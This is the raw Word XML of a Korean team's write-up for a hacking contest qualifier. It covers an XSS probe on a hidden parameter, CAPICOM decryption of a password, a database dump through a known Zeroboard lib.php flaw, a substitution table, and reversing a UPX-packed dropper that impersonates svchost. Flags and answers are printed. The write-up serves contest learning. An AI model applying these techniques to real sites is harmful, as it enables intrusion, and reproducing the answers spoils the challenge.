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64" w:rsidRPr="00B53470" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B53470">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TEAM [Our girlfriends are pissed]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해킹대회 예선 풀이 보고서</w:t>
      </w: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Pr="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="004502C1">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨1풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>문제를</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 풀기 위해 처음 level1 서버에 접근하면 login.php를 이용하여 로그인을 하라는</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>내용이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 나옵니다. ID는 wowhacker라는 친절한 힌트도 알려주고 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>우리의</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 목표는 Password입니다. ID 값이 무엇인지 알고 있기 때문에 Password만 알아내면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 할 수 있고, 로그인을 하면 다음 레벨의 패스워드를 알 수 있게될거라 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>생각했습니다</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사실</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 저희는 brute force가 필요할 거란 문제라고는 생각하지 않았기 때문에 hint.jsp를 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>찾지</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 못했습니다. nikto 등의 프로그램을 이용하여 나온 정보로 여러 잠재적 hole을</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공략하려</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 노력했는데 결국 삽질만 하다가 실패를 했습니다. login.php를 대상으로 각종</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>sql injection을 시도해보았으나 아무런 메시지도 뜨지 않길래 어리둥절 했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>설마</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> blind sql injection일까? 라고도 의심해봤지만 level1부터 그런 문제를 냈을</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>거라곤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 생각하지 않아서 sql injection 시도는 여기서 포기했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한참</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 시간이 지나서 힌트가 나왔는데, hint.jsp라고 알려줬습니다. 이때 login.php는</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>실제로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> php가 아니라 jsp라는 것을 알게 됐지만 문제 풀이에 도움이 될 타이밍은</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>지나간</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 때였습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이제</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hint.jsp를 이용해서 뭔가를 해야겠는데 뭔가를 해야할지 도저히 감을 못 잡고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>있었습니다</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>hidden으로 박혀있는 hinehong이라는 변수를 활용해야 다음 단계로 진행될 수</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>있을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 것 같았는데 hinehong 변수에 어떠한 값을 입력해도 별로 특별한 메시지가 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>안나오더군요</w:t>
      </w:r>
      <w:r>
        <w:t>. 처음엔 ../../../.. 같이 directory traversal 문제인가 싶어서</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>별수를</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 다 썼는데.. 실패!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>결국엔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 팀 멤버 중 누군가가 우연히 hinehong=&lt;script&gt;를 대입해본 결과.. 새로운</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>메시지가</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 뜨는 것을 확인했고, 그 새로운 메시지를 이용하여 다음 단계에 진입했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>(&lt;script&gt;는 XSS 공격에 필요한 전형적인 태그인데, XSS 공격일 거라고는 생각도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하지</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 못했습니다. 일반적으로 XSS는 관리자가 해당 공격 태그를 읽어야만 다음 공격이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진행되는데</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 지금 상황은 관리자를 공격하는게 아니라고 생각했기 때문이죠. 이것도 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>소</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 뒷걸음치다가 알아낸 격이네요.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>새로운</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 메시지에는 새로운 link가 걸려 있었습니다. 해당 파일은 vbs로 작성되어</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>있는데</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 이 vbs는 특정 페이지에 접근하여 암호화된 데이터를 가지고 옵니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 암호화의 종류에 대해서는 vbs에서 gcKey라는 변수를 사용함으로써 이미 암시를 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해줬기</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 때문에 따로 노가다는 필요 없었습니다. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해당</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 암호화 라이브러리는 MS에서 제공하는 것으로, CAPICOM.EncryptedData라는 COM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>접근을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 사용하여 호출할 수 있습니다. 여기서부터는 간단합니다. 따로 복호화를</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구현할</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 필요할 필요 없이 COM 기능을 사용하면 되기 때문에..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>Set wassup = CreateObject("CAPICOM.EncryedData")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>wassup.SetSecret key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>wassup.Decrypt xmlhttp.responseText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>위처럼</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 하시면 복호화가 진행되고 그 복호화된 plain 텍스트는 wassup.Content에</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>저장됩니다</w:t>
      </w:r>
      <w:r>
        <w:t>. 이 값을 출력하여 확인하시면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t>dhkdngozjxlathvmxmvhfjaghdehdcjfgood</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 볼 수 있고 이 패스워드를 이용하여 login.php에 로그인하시면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:r>
        <w:t xml:space="preserve">The result is WowhackerFighting!!!!!@KoreaFighting&amp;hinehong </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264"/>
    <w:p w:rsidR="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>값을</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 확인할 수 있습니다!</w:t>
      </w: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Default="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F44264" w:rsidRPr="00F44264" w:rsidRDefault="00F44264" w:rsidP="00F44264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="004502C1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨2풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00631465" w:rsidP="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>중국발 해킹에서 많이 사용됬던 제로보드의 l</w:t>
      </w:r>
      <w:r w:rsidR="00FD5356">
        <w:t>ib.</w:t>
      </w:r>
      <w:r w:rsidR="00FD5356">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 $REMOST_HOST</w:t>
      </w:r>
      <w:r w:rsidR="00FD5356">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 취약점을 이용하여 DB를 덤프했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그랬더니 암호를 묻는 실행파일의 주소를 알려주더군요.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>암호</w:t>
      </w:r>
      <w:r w:rsidR="00FD5356">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>은 아래와 같은 대조표를 만들어서 매칭시켰습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00631465" w:rsidRDefault="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00631465" w:rsidRDefault="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일단 XX인 p로 모든 문자갯수를 맞춘 다음. 앞에서부터 하나하나 문자를 변경해 가면서 해당 문자가 치환하는 영역을 확인한 다음 문자표를 참고하여 올바른 문자로 치환했습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00631465" w:rsidRDefault="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>앞에서부터 차근차근 해 나가면 됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD5356" w:rsidTr="00FD5356">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr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a = FA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b = DF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c = AX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d = VD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e = GV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f = AA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g = DD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h = VF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i = XV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j = DG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k = FF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l = XA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m = AG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n = AD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o = XD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p = XX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q = FX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r = VX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s = FG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t = VG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u = VA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v = XG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w = DX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x = DA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y = GG</w:t>
            </w:r>
          </w:p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z = XF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356" w:rsidP="004502C1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>레벨 3 풀이</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">otepad.exe가 있습니다. </w:t>
      </w:r>
      <w:r w:rsidR="00631465">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Filemon으로 모니터링을 하면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 파일</w:t>
      </w:r>
      <w:r w:rsidR="00631465">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 윈도우 temp디렉토리에 svch0st.exe와 notepad.exe를 </w:t>
      </w:r>
      <w:r w:rsidR="00631465">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>생성함을 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00631465" w:rsidRDefault="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">생성된 notepad.exe는 일반적인 노트패드 파일이고 svch0st.exe가 </w:t>
      </w:r>
      <w:r w:rsidR="00631465">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">노트패드 프로세스에 붙어서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>암호를 물어보는 루틴입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRPr="00631465" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00631465">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vch0st.exe</w:t>
      </w:r>
      <w:r w:rsidR="00FD5356">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>실행압축(UPX)을 푼 후 비교문에서 bp를 잡은 후 앞에서부터 암호를 생성해 나갔습니다.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD5356" w:rsidTr="00FD5356">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9224" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00FD5356">
              <w:t>"Q`TThnmBmEQqdoBq`Uhnm"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00FD5356">
              <w:t>PaSSionAnDPrepAraTion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD5356" w:rsidRDefault="00FD5356">
      <w:pPr>
        <w:widowControl/>
